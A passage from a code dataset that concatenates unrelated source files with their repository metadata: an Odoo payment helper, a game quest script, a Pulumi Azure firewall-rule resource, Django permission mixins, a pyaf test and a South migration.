        payment_data = {
            'period_id': inv_obj.period_id.id,
            'partner_id': payment_partner_id or inv_obj.partner_id.id,
            'journal_id':bank_journal_ids[0],
            'currency_id': inv_obj.currency_id.id,
            'reference': inv_obj.name or '', #payplan.name +':'+salesname
            'amount': amount,
            'state': 'draft',
            'name': '',
            'payment_date': inv_obj.date_invoice or fields.Date.context_today(self),
            'company_id': inv_obj.company_id and inv_obj.company_id.id or False,
            'payment_method_id':payment_method_id,
            'payment_type': 'inbound',
            'partner_type': 'customer',
            'invoice_ids': [(4, inv_obj.id, None)]
        }
        # Optional check number passed through the context by the caller.
        if self._context.get('check_number',False):
            payment_data['check_number'] = self._context.get('check_number')
        # Fall back to the accounting period matching the invoice date.
        if not payment_data['period_id']:
            self=self.with_context(company_id=inv_obj.company_id and inv_obj.company_id.id )
            period_ids = period_obj.find(inv_obj.date_invoice)
            period_id = period_ids and period_ids[0] or False
            payment_data.update({'period_id':period_id})
        payment_id = payment_obj.create(payment_data)
        # Debug logging of the payment just created.
        logger = logging.getLogger('test2')
        logger.info("This is invoice ids------->%s " % str(payment_id.invoice_ids))
        logger.info("This is payment type------->%s " % str(payment_id.payment_type))
        logger.info("This is dest account id------->%s " % str(payment_id.destination_account_id))
        logger.info("This is partner id------->%s " % str(payment_id.partner_id))
        # Posting reconciles the payment against the linked invoice.
        payment_id.post()
        return payment_id.id
    @api.model
    def get_accounts_supplier(self,partner_id=False, journal_id=False):
        """Return the partner account and payment direction for a journal.

        :param partner_id: id of the partner being paid/paying
        :param journal_id: id of the journal ('sale' -> receivable/inbound,
            'purchase' -> payable/outbound)
        :return: dict of the form ``{'value': {'account_id': ..., 'type': ...}}``;
            both values are False for any other journal type or when an
            argument is missing.
        """
        default = {
            'value':{},
        }
        if not partner_id or not journal_id:
            return default
        partner_pool = self.env['res.partner']
        journal_pool = self.env['account.journal']
        journal = journal_pool.browse(journal_id)
        partner = partner_pool.browse(partner_id)
        account_id = False
        tr_type = False
        if journal.type =='sale':
            account_id = partner.property_account_receivable_id.id
            tr_type = 'inbound'
        elif journal.type == 'purchase':
            account_id = partner.property_account_payable_id.id
            tr_type = 'outbound'
        default['value']['account_id'] = account_id
        default['value']['type'] = tr_type
        return default
    @api.multi
    def pay_supplier_invoice(self,journal_id, amount):
        ''' Register and post an outbound payment for a supplier invoice.

        :param journal_id: id of the payment journal to use
        :param amount: payment amount
        :return: id of the created, posted ``account.payment``
        '''
        res, voucher_id = {}, False
        inv_obj = self
        invoice_number = inv_obj.number
        payment_obj = self.env['account.payment']
        period_obj = self.env['account.period']
        bank_journal_ids = [journal_id]
        # Pay the commercial parent when the invoice partner is a contact.
        payment_partner_id = inv_obj.partner_id.id
        if inv_obj.partner_id.parent_id:
            payment_partner_id = inv_obj.partner_id.parent_id.id
        self=self.with_context(
            default_partner_id=payment_partner_id or inv_obj.partner_id.id,
            default_amount=amount,
            default_name=inv_obj.name,
            close_after_process=True,
            invoice_type=inv_obj.type,
            invoice_id=inv_obj.id,
            journal_id=bank_journal_ids[0],
            default_type='payment'
        )
        date = fields.Date.context_today(self)
        # First outbound payment method — assumes one exists.
        payment_method_id = self.env['account.payment.method'].search([('payment_type', '=', 'outbound')], limit=1).id
        # For using payment of customer instead of contact
        payment_data = {
            'period_id': inv_obj.period_id.id,
            'partner_id': payment_partner_id,
            'journal_id': bank_journal_ids[0],
            'currency_id': inv_obj.currency_id.id,
            'reference': inv_obj.name or '', #payplan.name +':'+salesname
            'amount': amount,
            'payment_type': 'outbound',
            'state': 'draft',
            'name': '',
            # NOTE(review): the customer variant uses the 'payment_date' key
            # here while this one uses 'date' — confirm which field name the
            # installed account.payment model actually expects.
            'date': inv_obj.date_invoice or fields.Date.context_today(self),
            'company_id': inv_obj.company_id and inv_obj.company_id.id or False,
            'payment_method_id':payment_method_id,
            'partner_type':'supplier',
            'invoice_ids': [(4, inv_obj.id, None)],
        }
        # Fall back to the accounting period matching the invoice date.
        if not payment_data['period_id']:
            self=self.with_context(company_id=inv_obj.company_id and inv_obj.company_id.id or False)
            period_ids = period_obj.find(inv_obj.date_invoice)
            period_id = period_ids and period_ids[0] or False
            payment_data.update({'period_id':period_id})
        payment_id = payment_obj.create(payment_data)
        # Posting reconciles the payment against the linked invoice.
        payment_id.post()
        return payment_id.id
| [
"Vicky@planet-odoo.com"
] | Vicky@planet-odoo.com |
9a99affd9330d2197cca6838b31c5b0ee9a601f9 | a9fc496e0724866093dbb9cba70a8fdce12b67a9 | /scripts/quest/q38997s.py | 70187343f30d734e3f2f0de50048ea1ff1017575 | [
"MIT"
] | permissive | ryantpayton/Swordie | b2cd6b605f7f08f725f5e35d23ba3c22ef2ae7c0 | ca6f42dd43f63b1d2e6bb5cdc8fc051c277f326e | refs/heads/master | 2022-12-01T09:46:47.138072 | 2020-03-24T10:32:20 | 2020-03-24T10:32:20 | 253,997,319 | 2 | 0 | MIT | 2022-11-24T08:17:54 | 2020-04-08T05:50:22 | Java | UTF-8 | Python | false | false | 906 | py | # 410000002
# Quest dialog script: Moonbeam teaches the player the [Fox Trot] skill.
# `sm` (script manager) and `parentID` (quest id) are injected into the
# script's namespace by the game's quest engine at runtime.
MOONBEAM = 3002100  # NPC id used as the dialog speaker
sm.setSpeakerID(MOONBEAM)
# Intro dialog, then start the quest so the player can try the skill.
sm.sendNext("Let's start with #b[Fox Trot]#k. If you really do have ears, perk them up for this!")
sm.sendSay("#b[Fox Trot]#k is super helpful when you want to move quickly or get close to an enemy. You're way too slow to catch prey, so you need all the help you can get.")
sm.sendSay("Now try using #b[Fox Trot]#k. Oh, and it's a lot easier if you hotkey it and use it that way!")
sm.startQuest(parentID)
# Follow-up dialog, then complete the quest and grant the EXP reward.
sm.sendNext("Whaddaya think? Was that amazingly fast, or what? Use this skill to get close to your prey.")
sm.sendSay("Use this skill when you're using other skills to #binterrupt#k the first one and #bmove#k quickly!")
sm.sendSay("I know you can be a little slow, Shade. Are you keeping up?")
sm.sendSay("I'll tell you how to use it to make up for your weakness. Talk to me when you're ready!")
sm.completeQuest(parentID)
sm.giveExp(700)
"mechaviv@gmail.com"
] | mechaviv@gmail.com |
7588a1f1d54c158868ca7d9adccae62c33984539 | 5e6d8b9989247801718dd1f10009f0f7f54c1eb4 | /sdk/python/pulumi_azure_native/dbformysql/v20210501/firewall_rule.py | badcbf6bc5c32f77ee493d353ec35ac77c0890c9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | vivimouret29/pulumi-azure-native | d238a8f91688c9bf09d745a7280b9bf2dd6d44e0 | 1cbd988bcb2aa75a83e220cb5abeb805d6484fce | refs/heads/master | 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,069 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['FirewallRuleArgs', 'FirewallRule']
@pulumi.input_type
class FirewallRuleArgs:
def __init__(__self__, *,
end_ip_address: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
server_name: pulumi.Input[str],
start_ip_address: pulumi.Input[str],
firewall_rule_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a FirewallRule resource.
:param pulumi.Input[str] end_ip_address: The end IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] server_name: The name of the server.
:param pulumi.Input[str] start_ip_address: The start IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] firewall_rule_name: The name of the server firewall rule.
"""
pulumi.set(__self__, "end_ip_address", end_ip_address)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "server_name", server_name)
pulumi.set(__self__, "start_ip_address", start_ip_address)
if firewall_rule_name is not None:
pulumi.set(__self__, "firewall_rule_name", firewall_rule_name)
@property
@pulumi.getter(name="endIpAddress")
def end_ip_address(self) -> pulumi.Input[str]:
"""
The end IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "end_ip_address")
@end_ip_address.setter
def end_ip_address(self, value: pulumi.Input[str]):
pulumi.set(self, "end_ip_address", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Input[str]:
"""
The name of the server.
"""
return pulumi.get(self, "server_name")
@server_name.setter
def server_name(self, value: pulumi.Input[str]):
pulumi.set(self, "server_name", value)
@property
@pulumi.getter(name="startIpAddress")
def start_ip_address(self) -> pulumi.Input[str]:
"""
The start IP address of the server firewall rule. Must be IPv4 format.
"""
return pulumi.get(self, "start_ip_address")
@start_ip_address.setter
def start_ip_address(self, value: pulumi.Input[str]):
pulumi.set(self, "start_ip_address", value)
@property
@pulumi.getter(name="firewallRuleName")
def firewall_rule_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the server firewall rule.
"""
return pulumi.get(self, "firewall_rule_name")
@firewall_rule_name.setter
def firewall_rule_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "firewall_rule_name", value)
class FirewallRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
end_ip_address: Optional[pulumi.Input[str]] = None,
firewall_rule_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
start_ip_address: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a server firewall rule.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] end_ip_address: The end IP address of the server firewall rule. Must be IPv4 format.
:param pulumi.Input[str] firewall_rule_name: The name of the server firewall rule.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] server_name: The name of the server.
:param pulumi.Input[str] start_ip_address: The start IP address of the server firewall rule. Must be IPv4 format.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FirewallRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Represents a server firewall rule.
:param str resource_name: The name of the resource.
:param FirewallRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FirewallRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
end_ip_address: Optional[pulumi.Input[str]] = None,
firewall_rule_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
start_ip_address: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
if end_ip_address is None and not opts.urn:
raise TypeError("Missing required property 'end_ip_address'")
__props__.__dict__["end_ip_address"] = end_ip_address
__props__.__dict__["firewall_rule_name"] = firewall_rule_name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
if start_ip_address is None and not opts.urn:
raise TypeError("Missing required property 'start_ip_address'")
__props__.__dict__["start_ip_address"] = start_ip_address
__props__.__dict__["name"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:dbformysql/v20210501:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20200701preview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20200701preview:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20200701privatepreview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20200701privatepreview:FirewallRule"), pulumi.Alias(type_="azure-native:dbformysql/v20210501preview:FirewallRule"), pulumi.Alias(type_="azure-nextgen:dbformysql/v20210501preview:FirewallRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(FirewallRule, __self__).__init__(
'azure-native:dbformysql/v20210501:FirewallRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'FirewallRule':
"""
Get an existing FirewallRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = FirewallRuleArgs.__new__(FirewallRuleArgs)
__props__.__dict__["end_ip_address"] = None
__props__.__dict__["name"] = None
__props__.__dict__["start_ip_address"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return FirewallRule(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter(name="endIpAddress")
    def end_ip_address(self) -> pulumi.Output[str]:
        """
        The end IP address of the server firewall rule. Must be IPv4 format.
        """
        # Output property: the value is resolved asynchronously by the Pulumi engine.
        return pulumi.get(self, "end_ip_address")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The name of the resource
        """
        # Output property: the value is resolved asynchronously by the Pulumi engine.
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="startIpAddress")
    def start_ip_address(self) -> pulumi.Output[str]:
        """
        The start IP address of the server firewall rule. Must be IPv4 format.
        """
        # Output property: the value is resolved asynchronously by the Pulumi engine.
        return pulumi.get(self, "start_ip_address")
    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """
        The system metadata relating to this resource.
        """
        # Output property: the value is resolved asynchronously by the Pulumi engine.
        return pulumi.get(self, "system_data")
    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """
        The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
        """
        # Output property: the value is resolved asynchronously by the Pulumi engine.
        return pulumi.get(self, "type")
| [
"noreply@github.com"
] | vivimouret29.noreply@github.com |
1fef7a4826a9cfda2ae498faf73994059b0b0e6c | 097dda217c3d31b69cb309369dc0357fe0f229ab | /app/customadmin/mixins.py | 2a50cfaa427fe7b145bd481d88229b25ee87aa49 | [] | no_license | Jaycitrusbug/book-python | 57a96ee343eee5b63ca5f7ee2461db82426321b5 | b5a4de74c9114546ee03b8aa5de1381719ddf74e | refs/heads/master | 2023-06-20T01:52:29.484415 | 2021-07-16T13:06:05 | 2021-07-16T13:06:05 | 386,638,204 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,461 | py | # -*- coding: utf-8 -*-
from django.contrib import messages
from django.contrib.auth import get_permission_codename
from django.core.exceptions import ImproperlyConfigured
from django.shortcuts import redirect
# -----------------------------------------------------------------------------
class SuccessMessageMixin(object):
    """CBV mixin which flashes ``success_message`` after a successful form save.

    The message is skipped for AJAX requests so that JSON/partial responses
    are not polluted with queued messages.
    """

    # Override on subclasses, or override get_success_message() for a
    # dynamically-built message.
    success_message = ""

    def get_success_message(self):
        """Return the message to queue; hook point for dynamic messages."""
        return self.success_message

    def form_valid(self, form):
        """Save via the parent view, then queue the success message (non-AJAX only)."""
        response = super().form_valid(form)
        success_message = self.get_success_message()
        # NOTE(review): request.is_ajax() was removed in Django 4.0; on upgrade
        # this must switch to checking the X-Requested-With header — TODO confirm
        # the project's Django version.
        if not self.request.is_ajax() and success_message:
            messages.success(self.request, success_message)
        return response
class ModelOptsMixin(object):
    """CBV mixin that exposes the model's ``_meta`` options as ``opts`` in the context."""

    def get_context_data(self, **kwargs):
        """Return the parent context, augmented with ``opts`` when a model is configured."""
        context = super().get_context_data(**kwargs)
        # Only views that declare a ``model`` attribute get the extra key.
        if hasattr(self, "model"):
            context["opts"] = self.model._meta
        return context
class HasPermissionsMixin(object):
    """CBV mixin which adds ModelAdmin-style ``has_*_permission`` checks.

    Each check consults Django's permission framework for ``self.model`` and
    additionally grants access to staff users (``request.user.is_staff``).
    ``get_context_data`` exposes the results to templates.
    """

    def _has_model_permission(self, request, action):
        """Return True if the user holds the ``<action>`` permission on ``self.model``, or is staff."""
        opts = self.model._meta
        codename = get_permission_codename(action, opts)
        return request.user.has_perm("%s.%s" % (opts.app_label, codename)) or request.user.is_staff

    def has_add_permission(self, request):
        """
        Return True if the given request has permission to add an object.
        Can be overridden by the user in subclasses.
        """
        return self._has_model_permission(request, "add")

    def has_change_permission(self, request, obj=None):
        """
        Return True if the request may change objects of this type.

        ``obj`` is accepted for API compatibility with ModelAdmin but is not
        examined; the check is made against the model as a whole.
        """
        return self._has_model_permission(request, "change")

    def has_delete_permission(self, request, obj=None):
        """
        Return True if the request may delete objects of this type
        (``obj`` is accepted for API compatibility but ignored).
        """
        return self._has_model_permission(request, "delete")

    def has_view_permission(self, request, obj=None):
        """
        Return True if the request may view objects of this type.

        As in Django's admin, holding the "change" permission implies "view".
        """
        return (
            self._has_model_permission(request, "view")
            or self._has_model_permission(request, "change")
        )

    def has_view_or_change_permission(self, request, obj=None):
        """Return True if the request may either view or change objects of this type."""
        # has_view_permission already covers change/staff access, but keep the
        # explicit composition to mirror Django's ModelAdmin API.
        return self.has_view_permission(request, obj) or self.has_change_permission(request, obj)

    def has_module_permission(self, request):
        """
        Return True if the request may access this model's app on the index page.

        Does not restrict access to the add/change/delete views themselves; use
        the ``has_(add|change|delete)_permission`` checks for that.
        """
        opts = self.model._meta
        return request.user.has_module_perms(opts.app_label) or request.user.is_staff

    def get_context_data(self, **kwargs):
        """Return the parent context augmented with the permission flags."""
        ctx = super().get_context_data(**kwargs)
        if hasattr(self, "model"):
            ctx["has_add_permission"] = self.has_add_permission(self.request)
            ctx["has_change_permission"] = self.has_change_permission(self.request)
            ctx["has_delete_permission"] = self.has_delete_permission(self.request)
            ctx["has_view_permission"] = self.has_view_permission(self.request)
            ctx["has_view_or_change_permission"] = self.has_view_or_change_permission(
                self.request
            )
            ctx["has_module_permission"] = self.has_module_permission(self.request)
        if hasattr(self, "object"):
            ctx["add"] = self.object is None
        return ctx
| [
"jay.citrusbug@gmail.com"
] | jay.citrusbug@gmail.com |
ab44c61a08bafb6bc721cd98b410a587695b4f8f | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_Anscombe/model_control_one_enabled_Anscombe_MovingAverage_Seasonal_Second_ARX.py | c958c960f5731fcc823ea172e5b07cbf2c2a8f40 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 166 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
# Build/evaluate one ozone test model: Anscombe transformation, MovingAverage
# trend, Seasonal_Second cycle, and an ARX autoregressive component.
testmod.build_model( ['Anscombe'] , ['MovingAverage'] , ['Seasonal_Second'] , ['ARX'] );
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
7b1b7a1f6efa7c705b819d292641046e170df0b9 | 548c26cc8e68c3116cecaf7e5cd9aadca7608318 | /dealprops/migrations/0008_auto__add_field_dailydeal_steal_now_image__del_field_dailydealimage_da.py | d69f30823cdf4a1e8fd38ec395041851b0de51a3 | [] | no_license | Morphnus-IT-Solutions/riba | b69ecebf110b91b699947b904873e9870385e481 | 90ff42dfe9c693265998d3182b0d672667de5123 | refs/heads/master | 2021-01-13T02:18:42.248642 | 2012-09-06T18:20:26 | 2012-09-06T18:20:26 | 4,067,896 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 16,890 | py | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    def forwards(self, orm):
        """Apply the schema migration.

        Moves the deal's "steal now" artwork off the per-image table and onto
        the DailyDeal row itself (nullable, so existing rows stay valid).
        """
        # Adding field 'DailyDeal.steal_now_image'
        db.add_column('dealprops_dailydeal', 'steal_now_image', self.gf('django.db.models.fields.files.ImageField')(max_length=100, null=True, blank=True), keep_default=False)
        # Deleting field 'DailyDealImage.day_image'
        db.delete_column('dealprops_dailydealimage', 'day_image')
        # Deleting field 'DailyDealImage.steal_now_image'
        db.delete_column('dealprops_dailydealimage', 'steal_now_image')
    def backwards(self, orm):
        """Revert the schema migration.

        Drops DailyDeal.steal_now_image and re-creates the image columns on
        DailyDealImage with '' defaults (the original data is not recoverable).
        """
        # Deleting field 'DailyDeal.steal_now_image'
        db.delete_column('dealprops_dailydeal', 'steal_now_image')
        # Adding field 'DailyDealImage.day_image'
        db.add_column('dealprops_dailydealimage', 'day_image', self.gf('django.db.models.fields.files.ImageField')(default='', max_length=100), keep_default=False)
        # Adding field 'DailyDealImage.steal_now_image'
        db.add_column('dealprops_dailydealimage', 'steal_now_image', self.gf('django.db.models.fields.files.ImageField')(default='', max_length=100), keep_default=False)
models = {
'accounts.account': {
'Meta': {'object_name': 'Account'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['accounts.Client']"}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'confirmed_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> order@chaupaati.com'", 'max_length': '500'}),
'confirmed_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'customer_support_no': ('django.db.models.fields.CharField', [], {'max_length': '150', 'blank': 'True'}),
'dni': ('django.db.models.fields.CharField', [], {'max_length': '5', 'blank': 'True'}),
'greeting_text': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'greeting_title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_exclusive': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'pending_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> lead@chaupaati.com'", 'max_length': '500'}),
'pending_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'pg_return_url': ('django.db.models.fields.URLField', [], {'default': "'http://www.chaupaati.in'", 'max_length': '200', 'blank': 'True'}),
'primary_email': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'primary_phone': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'returns_policy': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'secondary_email': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'secondary_phone': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}),
'share_product_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> share@chaupaati.com'", 'max_length': '500'}),
'shipping_policy': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'signature': ('django.db.models.fields.TextField', [], {}),
'sms_mask': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'tos': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'Channel'", 'max_length': '100'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'accounts.client': {
'Meta': {'object_name': 'Client'},
'confirmed_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> order@chaupaati.com'", 'max_length': '500'}),
'confirmed_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'noreply_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> noreply@chaupaati.com'", 'max_length': '200'}),
'pending_order_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> lead@chaupaati.com'", 'max_length': '500'}),
'pending_order_helpline': ('django.db.models.fields.CharField', [], {'default': "'0-922-222-1947'", 'max_length': '25'}),
'share_product_email': ('django.db.models.fields.CharField', [], {'default': "'<Chaupaati Bazaar> share@chaupaati.com'", 'max_length': '500'}),
'signature': ('django.db.models.fields.TextField', [], {}),
'sms_mask': ('django.db.models.fields.TextField', [], {'blank': 'True'})
},
'catalog.availability': {
'Meta': {'object_name': 'Availability'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'catalog.brand': {
'Meta': {'object_name': 'Brand'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'})
},
'catalog.product': {
'Meta': {'object_name': 'Product'},
'brand': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Brand']"}),
'cart_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.Category']"}),
'confirmed_order_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'created_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'inr'", 'max_length': '3'}),
'description': ('tinymce.models.HTMLField', [], {}),
'ext_large_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'ext_medium_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'ext_small_image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'has_images': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'meta_description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'moderate': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True', 'blank': 'True'}),
'modified_on': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'page_title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'pending_order_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'product_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['categories.ProductType']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150', 'db_index': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'active'", 'max_length': '15', 'db_index': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'normal'", 'max_length': '10'}),
'video_embed': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'view_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.sellerratechart': {
'Meta': {'object_name': 'SellerRateChart'},
'article_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'blank': 'True'}),
'availability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Availability']"}),
'cod_available_at': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'cod_available_at'", 'null': 'True', 'to': "orm['catalog.Availability']"}),
'cod_charge': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '6', 'decimal_places': '2', 'blank': 'True'}),
'condition': ('django.db.models.fields.CharField', [], {'default': "'new'", 'max_length': '5', 'db_index': 'True'}),
'detailed_desc': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'external_product_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'external_product_link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'gift_desc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'gift_title': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_cod_available': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
